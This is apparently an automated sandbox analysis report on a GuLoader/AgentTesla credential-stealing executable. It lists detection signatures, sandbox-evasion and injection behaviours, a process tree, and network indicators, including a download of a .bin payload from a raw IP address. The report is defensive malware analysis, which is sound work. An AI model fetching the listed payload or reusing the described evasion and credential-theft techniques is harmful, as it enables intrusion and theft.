Loading ...

Play interactive tourEdit tour

Analysis Report SKM_C3350191107102300.exe

Overview

General Information

Sample Name:SKM_C3350191107102300.exe
Analysis ID:356107
MD5:58bb0368bc9cf6ec86c266f54cdefeeb
SHA1:1b9beee4bf56a4d5b31654b7c7404df5ff13f2fe
SHA256:d8eb1f98c2e365646d4b849ce9463769f173f7b4c95ea4dc705429a1798e1cfb
Tags:GuLoader

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • SKM_C3350191107102300.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\SKM_C3350191107102300.exe' MD5: 58BB0368BC9CF6EC86C266F54CDEFEEB)
    • RegAsm.exe (PID: 6504 cmdline: 'C:\Users\user\Desktop\SKM_C3350191107102300.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: RegAsm.exe PID: 6504JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      Process Memory Space: RegAsm.exe PID: 6504JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 6504JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: SKM_C3350191107102300.exeVirustotal: Detection: 21%Perma Link

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: SKM_C3350191107102300.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.6:49726 -> 185.222.58.152:80
          Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
          Source: global trafficHTTP traffic detected: GET /EDUORIGIN_baxLdLkc20.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.222.58.152Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.152
          Source: global trafficHTTP traffic detected: GET /EDUORIGIN_baxLdLkc20.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.222.58.152Cache-Control: no-cache
          Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: RegAsm.exeString found in binary or memory: http://185.222.58.152/EDUORIGIN_baxLdLkc20.bin
          Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmpString found in binary or memory: http://sHYyUE.com
          Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

          System Summary:

          barindex
          Potential malicious icon foundShow sources
          Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_021066CF NtMapViewOfSection,0_2_021066CF
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106A5A NtMapViewOfSection,0_2_02106A5A
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106A7E NtMapViewOfSection,0_2_02106A7E
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106A9A NtMapViewOfSection,0_2_02106A9A
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106AB6 NtMapViewOfSection,0_2_02106AB6
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106ADE NtMapViewOfSection,0_2_02106ADE
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106B0A NtMapViewOfSection,0_2_02106B0A
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106B2E NtMapViewOfSection,0_2_02106B2E
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_0210677A NtProtectVirtualMemory,NtMapViewOfSection,0_2_0210677A
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106B7A NtMapViewOfSection,0_2_02106B7A
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106B9E NtMapViewOfSection,0_2_02106B9E
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106BBA NtMapViewOfSection,0_2_02106BBA
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106BE2 NtMapViewOfSection,0_2_02106BE2
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_0210680C NtProtectVirtualMemory,NtMapViewOfSection,0_2_0210680C
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106C32 NtMapViewOfSection,0_2_02106C32
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_0210687F NtProtectVirtualMemory,NtMapViewOfSection,0_2_0210687F
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106896 NtMapViewOfSection,0_2_02106896
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02106CAA NtMapViewOfSection,0_2_02106CAA
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_0210693E NtMapViewOfSection,0_2_0210693E
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_0210698E NtMapViewOfSection,0_2_0210698E
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_021069AA NtMapViewOfSection,0_2_021069AA
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_021069D6 NtMapViewOfSection,0_2_021069D6
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_021069F6 NtMapViewOfSection,0_2_021069F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0130693A NtSetInformationThread,4_2_0130693A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_013063BF NtProtectVirtualMemory,4_2_013063BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_013069AA NtSetInformationThread,4_2_013069AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0130698E NtSetInformationThread,4_2_0130698E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_013069F6 NtSetInformationThread,4_2_013069F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_013069D6 NtSetInformationThread,4_2_013069D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306B2E NtSetInformationThread,4_2_01306B2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306B0A NtSetInformationThread,4_2_01306B0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306B7A NtSetInformationThread,4_2_01306B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306BBA NtSetInformationThread,4_2_01306BBA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306B9E NtSetInformationThread,4_2_01306B9E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306BE2 NtSetInformationThread,4_2_01306BE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306A7E NtSetInformationThread,4_2_01306A7E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306A5A NtSetInformationThread,4_2_01306A5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306AB6 NtSetInformationThread,4_2_01306AB6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306A9A NtSetInformationThread,4_2_01306A9A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306ADE NtSetInformationThread,4_2_01306ADE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306C32 NtSetInformationThread,4_2_01306C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01306CAA NtSetInformationThread,4_2_01306CAA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FE78D84_2_00FE78D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FE41E84_2_00FE41E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FE99C04_2_00FE99C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FE12F84_2_00FE12F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FEE5884_2_00FEE588
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00FE41E04_2_00FE41E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_1D972CD84_2_1D972CD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_1D9700064_2_1D970006
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_1D9700404_2_1D970040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_1D97C3B04_2_1D97C3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_1D9805D84_2_1D9805D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_1DB146A04_2_1DB146A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_1DB146904_2_1DB14690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_1DB146504_2_1DB14650
          Source: SKM_C3350191107102300.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SKM_C3350191107102300.exe, 00000000.00000002.387312508.00000000020B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs SKM_C3350191107102300.exe
          Source: SKM_C3350191107102300.exe, 00000000.00000000.329778630.000000000040F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKlysnerstorv8.exe vs SKM_C3350191107102300.exe
          Source: SKM_C3350191107102300.exeBinary or memory string: OriginalFilenameKlysnerstorv8.exe vs SKM_C3350191107102300.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
          Source: SKM_C3350191107102300.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@4/0@0/1
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_01
          Source: SKM_C3350191107102300.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SKM_C3350191107102300.exeVirustotal: Detection: 21%
          Source: unknownProcess created: C:\Users\user\Desktop\SKM_C3350191107102300.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe' Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

          Data Obfuscation:

          barindex
          Yara detected GuLoaderShow sources
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_00408C00 push 0000001Eh; iretd 0_2_00408C0F
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_00403EDA push edi; retf 0_2_00403F29
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02105A4A push es; ret 0_2_02105A7C
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02105A71 push es; ret 0_2_02105A7C
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02101CBE push ss; retf 0_2_02101D39
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_021008AB push edx; ret 0_2_021008AC
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02101CD6 push ss; retf 0_2_02101D39
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02101D1C push ss; retf 0_2_02101D39
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02101D1C push ss; retf 0_2_02101D49
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02101D3E push ss; retf 0_2_02101D49
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_02101D28 push ss; retf 0_2_02101D39
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_021045B1 push ebx; retf 0_2_021045DA
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeCode function: 0_2_021005AF push cs; retf 0_2_021005B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_1D979E4C push E8FFFFFFh; retf 4_2_1D979E51
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
